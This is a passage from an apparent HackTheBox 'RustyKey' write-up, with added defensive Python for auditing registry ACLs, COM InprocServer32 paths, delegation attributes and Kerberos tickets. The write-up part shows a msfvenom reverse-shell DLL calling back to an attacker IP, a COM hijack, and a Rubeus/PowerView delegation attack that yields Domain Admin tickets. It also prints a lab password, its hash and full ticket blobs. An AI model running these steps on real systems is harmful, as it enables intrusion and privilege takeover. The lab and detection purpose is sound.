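SECTION_RE = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")   # O:, G:, D:, S: sections
ACE_RE = re.compile(r"\(([^)]*)\)")                          # each (...) inside D:/S:


def rights_mask(text):
    """'KA' -> 0xF003F, 'CCDCLC...' -> OR of the two-letter codes, '0x1f' -> 0x1f."""
    if text.lower().startswith("0x"):
        return int(text, 16)
    mask = 0
    for i in range(0, len(text), 2):
        mask |= SDDL_RIGHTS[text[i:i + 2]]
    return mask


def parse_ace(text):
    """'A;CIID;KR;;;AC' -> dict(type, flags, mask, object_guid, inherit_guid, trustee)."""
    fields = text.split(";")
    if len(fields) < 6:
        raise ValueError("malformed ACE: " + text)
    ace_type, flags, rights, obj_guid, inh_guid, trustee = fields[:6]
    return {
        "type": ace_type,                                             # A = allow, D = deny
        "flags": [flags[i:i + 2] for i in range(0, len(flags), 2)],   # CI, OI, IO, ID, ...
        "mask": rights_mask(rights),
        "object_guid": obj_guid, "inherit_guid": inh_guid,
        "trustee": trustee,
    }


def parse_sddl(sddl):
    sd = {"owner": None, "group": None, "dacl_flags": "", "dacl": [], "sacl_flags": "", "sacl": []}
    for tag, body in SECTION_RE.findall(sddl):
        if tag == "O":
            sd["owner"] = body
        elif tag == "G":
            sd["group"] = body
        else:
            key = "dacl" if tag == "D" else "sacl"
            sd[key + "_flags"] = body.split("(", 1)[0]      # e.g. AI (auto-inherited), P (protected)
            sd[key] = [parse_ace(a) for a in ACE_RE.findall(body)]
    return sd


def canonical_sid(trustee):
    return WELL_KNOWN_SIDS.get(trustee, trustee)


def audit_write_access(sddl, kind="registry", trusted=("BA", "SY", "CO")):
    """Allow ACEs granting write-capable rights to principals outside the trusted set."""
    trusted_sids = {canonical_sid(t) for t in trusted}
    findings = []
    for ace in parse_sddl(sddl)["dacl"]:
        if ace["type"] != "A" or not ace["mask"] & WRITE_BITS[kind]:
            continue
        if canonical_sid(ace["trustee"]) not in trusted_sids:
            findings.append((ace["trustee"], ace["mask"]))
    return findings
```

Run against the SDDL above, the only finding is the `S-1-5-21-...-1132` entry with `KA` (KEY_ALL_ACCESS), i.e. the Support group; resolving that SID to a name is the one step this offline parser cannot do.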

#### COM Hijacking

| Feature               | **DLL Hijacking**                       | **COM Hijacking**                          |
| --------------------- | --------------------------------------- | ------------------------------------------ |
| **Target**            | Executables and DLL loading             | Registry-based COM class loading           |
| **Vector**            | Search order abuse                      | Registry redirection of CLSID or ProgID    |
| **Persistence?**      | No (unless abused in autostart apps)    | Yes — hijacked COM objects persist         |
| **PrivEsc?**          | Yes, if hijacked process runs as SYSTEM | Yes, if hijacked COM object runs as SYSTEM |
| **Ease of detection** | Medium (DLL file on disk)               | Harder — resides in the registry           |
| **Trigger Method**    | App must load the DLL                   | COM object must be instantiated            |

We first generate a reverse shell payload in `.dll` format using `msfvenom`:

```java
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
```

We then transfer the payload to the target host and point the default value of the `InprocServer32` key at the full path of the `.dll`. A few seconds later a process on the host instantiates this CLSID (which is what makes the hijack fire), and we get a reverse shell as the `mm.turner` user on our listener:

```java
PS C:\temp> Set-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(Default)" -Value "C:\temp\shell.dll"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(Default)" -Value "C:\temp\shell.dll"
PS C:\temp> reg query "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"
reg query "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\temp\shell.dll
    ThreadingModel    REG_SZ    Apartment

PS C:\temp>

```

```java
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ nc -nlvp 9001                       
listening on [any] 9001 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.75] 57283
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
whoami
rustykey\mm.turner

C:\Windows>

```
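The hijack above is visible in the registry itself, which is the detection angle: an added Python example (not from the write-up) that parses `reg query` output for `InprocServer32` keys and flags any whose default value loads a DLL from outside the expected roots. The sample input is constructed (the first key is the hijacked one shown above; the other two CLSIDs are invented for contrast), and the trusted-root list and environment-variable table are my assumptions; a real sweep would combine this with the ACL check, since a trusted path is only meaningful if non-admins cannot write to it.

```python
import ntpath
import re

# Constructed sample in the format of `reg query`: the hijacked 7-Zip key from above,
# plus two invented CLSIDs pointing at normal locations for contrast
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\temp\shell.dll
    ThreadingModel    REG_SZ    Apartment

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\7-Zip\7-zip.dll
    ThreadingModel    REG_SZ    Apartment

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66666666-7777-8888-9999-000000000000}\InprocServer32
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\shell32.dll
"""
HIJACKED_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"

# Assumed allow-list of directories a COM server DLL is expected to live under
TRUSTED_ROOTS = (r"C:\Windows", r"C:\Program Files", r"C:\Program Files (x86)")
# Assumed expansions for REG_EXPAND_SZ values
ENV = {"%SystemRoot%": r"C:\Windows", "%ProgramFiles%": r"C:\Program Files"}


def parse_reg_query(text):
    """{key_path: {value_name: (type, data)}} from `reg query` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():                 # unindented line = key header
            current = keys.setdefault(line.strip(), {})
        elif current is not None:                 # indented line = name / type / data
            parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
            parts += [""] * (3 - len(parts))      # tolerate an empty data field
            current[parts[0]] = (parts[1], parts[2])
    return keys


def expand(path):
    """Expand known %VARS%, strip quotes and normalise (collapses ..\ traversal)."""
    for var, val in ENV.items():
        path = re.sub(re.escape(var), lambda _m: val, path, flags=re.IGNORECASE)
    return ntpath.normpath(path.strip('"'))


def under_trusted_root(path, roots=TRUSTED_ROOTS):
    p = expand(path).lower()
    return any(p == r.lower() or p.startswith(r.lower() + "\\") for r in roots)


def suspicious_inproc_servers(text, roots=TRUSTED_ROOTS):
    """InprocServer32 keys whose default value loads a DLL from outside the trusted roots."""
    findings = []
    for key, values in parse_reg_query(text).items():
        if not key.lower().endswith("\\inprocserver32") or "(Default)" not in values:
            continue
        _vtype, dll = values["(Default)"]
        if not under_trusted_root(dll, roots):
            findings.append((key, dll))
    return findings
```

Feed it `reg query HKLM\SOFTWARE\Classes\CLSID /s` output (and the HKCU hive, where per-user hijacks live) and diff the findings against a known-good baseline; the normalisation step matters because `C:\Program Files\..\temp\x.dll` is still outside the trusted roots.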

### Shell as Administrator

Looking at BloodHound, we know that `MM.TURNER` -> MemberOf -> `DELEGATIONMANAGER` -> AddAllowedToAct -> `DC.RUSTYKEY`:

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F9m3hDishKBNvOpCRfLOY%2Fimage.png?alt=media&#x26;token=0c4d9441-9a67-4605-aa10-4923ab5b1ca3" alt=""><figcaption></figcaption></figure>

> The members of the group DELEGATIONMANAGER@RUSTYKEY.HTB can modify the msds-AllowedToActOnBehalfOfOtherIdentity attribute on the computer DC.RUSTYKEY.HTB.
>
> The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation (RBCD) to compromise the remote computer system.

We can either use a controlled user account that we can set an SPN for (`dd.ali`) or a controlled machine account (`IT-Computer3$`) for this attack. We also require the `Rubeus.exe` tool, since we're performing it from a Windows host:

#### **RBCD Attack (Machine Account)**

We first retrieve the security identifier (SID) of the `IT-Computer3$` machine account (using PowerView's `Get-DomainComputer`):

```java
PS C:\temp> $ComputerSid = Get-DomainComputer IT-Computer3 -Properties objectsid | Select -Expand objectsid
$ComputerSid = Get-DomainComputer IT-Computer3 -Properties objectsid | Select -Expand objectsid
PS C:\temp>
```

We then build a security descriptor whose DACL holds a single ACE with `IT-Computer3$`'s SID as the principal, granting it full control (the SDDL rights string `CCDCLCSWRPWPDTLOCRSDRCWDWO`, equivalent to `GenericAll`), and serialize it to the binary form needed to set the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute:

```java
PS C:\\temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\\temp> $SDBytes = New-Object byte[] ($SD.BinaryLength)
$SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\\temp> $SD.GetBinaryForm($SDBytes, 0)
$SD.GetBinaryForm($SDBytes, 0)
PS C:\\temp> 
```

Next, we write this security descriptor into the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of the domain controller's computer object. This step **effectively allows `IT-Computer3$` to impersonate any user when accessing the DC**:

```java
PS C:\temp> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
PS C:\temp>
```
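As an added example (not the write-up's own code, and not PowerView), this Python builds the same kind of self-relative security descriptor that the PowerShell above stores in `msDS-AllowedToActOnBehalfOfOtherIdentity` (one ACCESS_ALLOWED_ACE with the mask 0x000F01FF that the rights string `CCDCLCSWRPWPDTLOCRSDRCWDWO` expands to) and, more usefully for a defender, decodes such a blob read back from a computer object to list which SIDs may act on its behalf. The builder only exists so the decoder has input; `unexpected_delegators` is the check one would run against every DC. The binary layout follows the Windows SECURITY_DESCRIPTOR_RELATIVE, ACL and ACE structures; the owner SID and the "approved" list are assumptions.

```python
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 0x02
FULL_CONTROL_MASK = 0x000F01FF      # what CCDCLCSWRPWPDTLOCRSDRCWDWO expands to
BUILTIN_ADMINS = "S-1-5-32-544"     # the "O:BA" owner in the SDDL above


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count, 48-bit authority, 32-bit subs."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: " + sid)
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, offset):
    """Decode a binary SID at offset; returns (sid_string, byte_length)."""
    rev, count = buf[offset], buf[offset + 1]
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "S-%d-%d%s" % (rev, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_allowed_to_act(trustee_sid, owner_sid=BUILTIN_ADMINS):
    """Self-relative SD with a single ACCESS_ALLOWED_ACE, as written by the PowerShell above."""
    trustee = sid_to_bytes(trustee_sid)
    # ACE header: type, flags, size, then the access mask and the trustee SID
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(trustee), FULL_CONTROL_MASK) + trustee
    # ACL header: revision, sbz1, total size, ACE count, sbz2
    acl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(ace), 1, 0) + ace
    owner = sid_to_bytes(owner_sid)
    owner_off = 20                   # SECURITY_DESCRIPTOR_RELATIVE header is 20 bytes
    dacl_off = owner_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)   # owner, group, SACL, DACL offsets
    return header + owner + acl


def decode_allowed_to_act(blob):
    """List (trustee_sid, access_mask) for every allow ACE in the attribute's DACL."""
    if len(blob) < 20:
        return []                    # empty or truncated attribute: nobody may act on behalf
    _rev, _sbz, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", blob, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _acl_rev, _sbz1, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", blob, dacl_off)
    pos = dacl_off + 8
    entries = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask, = struct.unpack_from("<I", blob, pos + 4)
            sid, _ = sid_from_bytes(blob, pos + 8)
            entries.append((sid, mask))
        pos += ace_size              # skip object ACEs and deny ACEs by their declared size
    return entries


def unexpected_delegators(blob, allowed=()):
    """Defender check: trustees allowed to act on behalf of this computer that are not approved."""
    return [sid for sid, _mask in decode_allowed_to_act(blob) if sid not in set(allowed)]
```

In practice the blob comes from an LDAP read of the DC's computer object; any SID the decoder reports that is not on a documented list of front-end service accounts is a finding, and on a domain controller the expected list is normally empty.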

We then use `Rubeus` to hash the plaintext password of `IT-Computer3$` into its `RC4_HMAC` form:

```java
PS C:\tem> ./R.exe hash /password:Rusty88!
./R.exe hash /password:Rusty88!

[*] Action: Calculate Password Hash(es)

[*] Input password             : Rusty88!
[*]       rc4_hmac             : B52B582F02F8C0CD6320CD5EAB36D9C6

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

PS C:\tem>
```

Finally, we use the `s4u` module of `Rubeus` to get a service ticket for the `backupadmin` user, which is a member of Domain Admins:

```java
PS C:\tem> ./R.exe  s4u /user:IT-Computer3$ /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:backupadmin /msdsspn:cifs/DC.rustykey.htb /nowrap
./R.exe  s4u /user:IT-Computer3$ /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:backupadmin /msdsspn:cifs/DC.rustykey.htb /nowrap
[*] Action: S4U

[*] Using rc4_hmac hash: B52B582F02F8C0CD6320CD5EAB36D9C6
[*] Building AS-REQ (w/ preauth) for: 'rustykey.htb\IT-Computer3$'
[*] Using domain controller: fe80::d98:ec14:263a:b635%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFmDCCBZSgAwIBBaEDAgEWooIEqDCCBKRhggSgMIIEnKADAgEFoQ4bDFJVU1RZS0VZLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMcnVzdHlrZXkuaHRio4IEYDCCBFygAwIBF6EDAgECooIETgSCBEqjI6o/cMuKnrnmTq+NiMN0NN2lU0sIo74gbw6ZEwn/S2YK/GfQ1Yten6pBi04c16ZYeNwSFqHyosjJoe8hWThHlq9SZH1x051T1CfEOub7ZNYNurzA6Qpy3c5CVji9ejD60zCtPi1uUw1g0UwXIRjPaPIsGgz4RQkgiYi/IN17DWkelc3dHCs/1sBHsSS3sGlVQGQyCcnIGZcHamMRqA3SW+wXwg0FyiQI5I9SUpLXB73OHnGxlWYvrKPTaQrocxciqtpii/WIdo7Z+FTO2d2vCcKiIGnW1mZu7rHsP2d9S+XtMBErMt3XKWQj1mId+9w1lqZEhL9FYhWpZ8ORamn1Dimq6MXxI9n8Up1S4iBcyIoUZOIEmGxu8+E7clzdppcwbc0vTN7AWwXQaVjGng2oDFf5mzoGyaAhJQ2/Lq6zQDbg+IbsUPE9KlQERn3bQuWrPOjIS1UlkgtwEYap5zDZW2wEiWNuCeOrKg9KCAcNZkJNjB8u+6ndL8bSzGujMAvHugtAjgGUHYKwG79JzJCn5uR6ZM2exm0deUwTv9L9off2yZ8ZafQ9zgXpB5c8dkZfZToCdQGkrqvaGeA6I14QIFGZISn0umw8n3xl7YGQUq208hWl65XpOKWPJCpxS34QsKOWkTsPrWbZS+K4oOGE3qvrXtDY8W1IjTPx3RX7BLiR9nFmtO0S45LHMCmzk4f5hIi3hjfR944wCTMFQvZe7U3ZmG5mU5dWl/E9QxjwjpFXaKH+IE2ouTVkmOEdHmxcp2Y4hnxuaYqLTt/GINdRCzXwrHRtF3NSpeIgAxSPz1ZSGUAwNFynGLLEvzcSwUg/eqmJsXvw4t1mpGPGGdFudY0+uIZLe8dj9xr98Sca4trIqWAQ16ob7YJ/1VDBHKC9QLUZ/sgAXosaHIRxYV6WZ5dZxQpGfjCR+XrVr9St+DkhgkenaiDjrKH61XznOURMa7oI/BcjSRJ1N9Yv3ODDaj1xzgCYZwiZrNjW2sI1z2JtuhC0RxIOzhifntI04mr8STQeuJPsGwtC9xL75TJxy6SVtomUW8S0wmOrDM8AuQe3RW3B0WPnr9I69Hp1H9QhXRetSpVYwT+fFeLcmFVrrRo2hheh4AQNXGbUdPM9B0Aeh88NEz8MIARdz1BmXEAMENGrszYNZMQJrHmtQE4acsZFfR6VLWPqkIJYQLCzAWD2Lx6w6A2cLsi/FTe3B2Yr/rbvbvfBmg6i9QKEoVn72DGDkraC7+veP6cMxLdG6T5BNcjcvkxrpSKzF5arby7PiWlUDa+dHV0/htEMtXIDVoHGBkoCdWGzDW7CGIpZQB44Q5NNRPj71chok4XxRIwSBmcv5GGHGK6OXpL3ZgNPG8H+N/pi9KQe5OzfAjJNfA5isv7LYuOdHU50YbYfEkCKLbyWq1pxCeTWDAxIZV0zs5eGQVeAYeBPh7ruyvBAiy0io1dysUSkHEijgdswgdigAwIBAKKB0ASBzX2ByjCBx6CBxDCBwTCBvqAbMBmgAwIBF6ESBBC/yFmSKrMGDouZMGNIWAcOoQ4bDFJVU1RZS0VZLkhUQqIaMBigAwIBAaERMA8bDUlULUNvbXB1dGVyMySjBwMFAEDhAAClERgPMjAyNTA3MDMyMjI4MzNaphEYDzIwMjUwNzA0MDgyODMzWqcRGA8yMDI1MDcxMDIyMjgzM1qoDhsMUlVTVFlLRVkuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxydXN0eWtleS5odGI=

[*] Action: S4U

[*] Building S4U2self request for: 'IT-Computer3$@RUSTYKEY.HTB'
[*] Using domain controller: dc.rustykey.htb (fe80::d98:ec14:263a:b635%11)
[*] Sending S4U2self request to fe80::d98:ec14:263a:b635%11:88
[+] S4U2self success!
[*] Got a TGS for 'backupadmin' to 'IT-Computer3$@RUSTYKEY.HTB'
[*] base64(ticket.kirbi):

      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

[*] Impersonating user 'backupadmin' to target SPN 'cifs/DC.rustykey.htb'
[*] Building S4U2proxy request for service: 'cifs/DC.rustykey.htb'
[*] Using domain controller: dc.rustykey.htb (fe80::d98:ec14:263a:b635%11)
[*] Sending S4U2proxy request to domain controller fe80::d98:ec14:263a:b635%11:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/DC.rustykey.htb':

      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
PS C:\tem> 
```

#### System Shell

We copy and paste the Base64-encoded ticket, decode it and redirect the output to a file:

```java
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ echo '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' | base64 -d > backupadmin.kirbi
```

We then use `ticketConverter.py` from the **Impacket** suite to convert the ticket from `.kirbi` to the `.ccache` format that the Impacket tools read:

```java
└─$ impacket-ticketConverter backupadmin.kirbi backupadmin.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done
```
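Before a converted ticket is loaded into a cache it is worth checking what it actually asserts: which client principal, which service, and for how long. The script below is an added example and is not part of this write-up, of Rubeus or of Impacket. It walks the DER of a `.kirbi` (a Kerberos `KRB-CRED`) and reads those fields from the `EncKrbCredPart`, which Rubeus exports in the clear (the `backupadmin` ticket above has an enc-part etype of 0), and it cross-checks the service named inside the credential info against the `sname` of the embedded `Ticket`. The realm `EXAMPLE.LOCAL`, the principals `svc.user` and `cifs/dc.example.local`, the validity times and the function names `build_sample_kirbi` / `summarize_kirbi` are constructed for the example and are not values from the box.

```python
"""Inspect the plaintext metadata of a Kerberos KRB-CRED (.kirbi) blob.

Added example, not code from the RustyKey write-up, Rubeus or Impacket.
Only the fields that Rubeus leaves unencrypted (etype 0) are read; no key is needed.
"""
import base64
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Node:
    """One DER element: tag byte, raw content, and children if constructed."""
    tag: int
    value: bytes
    children: List["Node"] = field(default_factory=list)


def _read_len(buf: bytes, i: int):
    """Decode the DER length at buf[i]; return (length, index of the content)."""
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    if n == 0 or n > 4 or i + 1 + n > len(buf):
        raise ValueError("bad DER length")
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n


def der_parse(buf: bytes) -> List[Node]:
    """Parse DER into Nodes, recursing into constructed types (tag bit 0x20 set)."""
    nodes, i = [], 0
    while i < len(buf):
        tag = buf[i]
        if (tag & 0x1F) == 0x1F or i + 1 >= len(buf):
            raise ValueError("unsupported tag or truncated element")
        length, i = _read_len(buf, i + 1)
        body = buf[i:i + length]
        if len(body) != length:
            raise ValueError("truncated element")
        nodes.append(Node(tag, body, der_parse(body) if tag & 0x20 else []))
        i += length
    return nodes


def _ctx(node: Node, n: int) -> Optional[Node]:
    """Child carrying context-specific tag [n] (0xA0 | n), or None if absent."""
    return next((c for c in node.children if c.tag == (0xA0 | n)), None)


def _leaf(node: Optional[Node]) -> Optional[str]:
    """Text of the primitive inside a [n] wrapper (GeneralString or GeneralizedTime)."""
    return None if node is None else node.children[0].value.decode("ascii")


def _principal(node: Node) -> str:
    """PrincipalName -> 'comp1/comp2' from its [1] name-string SEQUENCE OF GeneralString."""
    comps = _ctx(node.children[0], 1).children[0].children
    return "/".join(c.value.decode("ascii") for c in comps)


def summarize_kirbi(b64: str) -> dict:
    """Report what a KRB-CRED asserts; requires its enc-part to be etype 0 (plaintext)."""
    cred = der_parse(base64.b64decode(b64))[0]
    if cred.tag != 0x76:                                        # [APPLICATION 22] KRB-CRED
        raise ValueError("not a KRB-CRED")
    body = cred.children[0]
    ticket = _ctx(body, 2).children[0].children[0].children[0]  # tickets[0] -> Ticket -> SEQUENCE
    enc = _ctx(body, 3).children[0]                             # enc-part: EncryptedData SEQUENCE
    etype = int.from_bytes(_ctx(enc, 0).children[0].value, "big", signed=True)
    if etype != 0:
        raise ValueError(f"enc-part uses etype {etype}; it cannot be read without the key")
    encpart = der_parse(_ctx(enc, 2).children[0].value)[0]     # OCTET STRING holds EncKrbCredPart
    if encpart.tag != 0x7D:                                     # [APPLICATION 29]
        raise ValueError("enc-part is not an EncKrbCredPart")
    info = _ctx(encpart.children[0], 0).children[0].children[0]  # ticket-info[0]: first KrbCredInfo
    return {
        "client": f"{_principal(_ctx(info, 2))}@{_leaf(_ctx(info, 1))}",
        "service": f"{_principal(_ctx(info, 9))}@{_leaf(_ctx(info, 8))}",
        "ticket_service": f"{_principal(_ctx(ticket, 2))}@{_leaf(_ctx(ticket, 1))}",
        "start": _leaf(_ctx(info, 5)),
        "end": _leaf(_ctx(info, 6)),
        "renew_till": _leaf(_ctx(info, 7)),
    }


# --- Constructed sample: a fake KRB-CRED built with the same encoding rules -----------

def _der(tag: int, content: bytes) -> bytes:
    """Encode one DER TLV with a short- or long-form length."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def _seq(*items: bytes) -> bytes: return _der(0x30, b"".join(items))
def _c(n: int, *items: bytes) -> bytes: return _der(0xA0 | n, b"".join(items))
def _gs(s: str) -> bytes: return _der(0x1B, s.encode())
def _gt(s: str) -> bytes: return _der(0x18, s.encode())
def _int(v: int) -> bytes: return _der(0x02, bytes([v]))   # small non-negative values only
def _pname(*parts: str) -> bytes: return _seq(_c(0, _int(1)), _c(1, _seq(*map(_gs, parts))))


def build_sample_kirbi(etype: int = 0) -> str:
    """Constructed, non-functional sample (not a real ticket); names and times are made up."""
    svc, realm = ("cifs", "dc.example.local"), "EXAMPLE.LOCAL"
    info = _seq(
        _c(0, _seq(_c(0, _int(23)), _c(1, _der(0x04, b"\x00" * 16)))),  # session key: dummy zeros
        _c(1, _gs(realm)), _c(2, _pname("svc.user")),
        _c(3, _der(0x03, b"\x00\x40\xa5\x00\x00")),                     # ticket flags: dummy
        _c(5, _gt("20250101120000Z")), _c(6, _gt("20250101220000Z")),
        _c(7, _gt("20250108120000Z")),
        _c(8, _gs(realm)), _c(9, _pname(*svc)),
    )
    encpart = _der(0x7D, _seq(_c(0, _seq(info))))                        # [APPLICATION 29]
    cipher = encpart if etype == 0 else b"\xAB" * len(encpart)            # "encrypted" = opaque bytes
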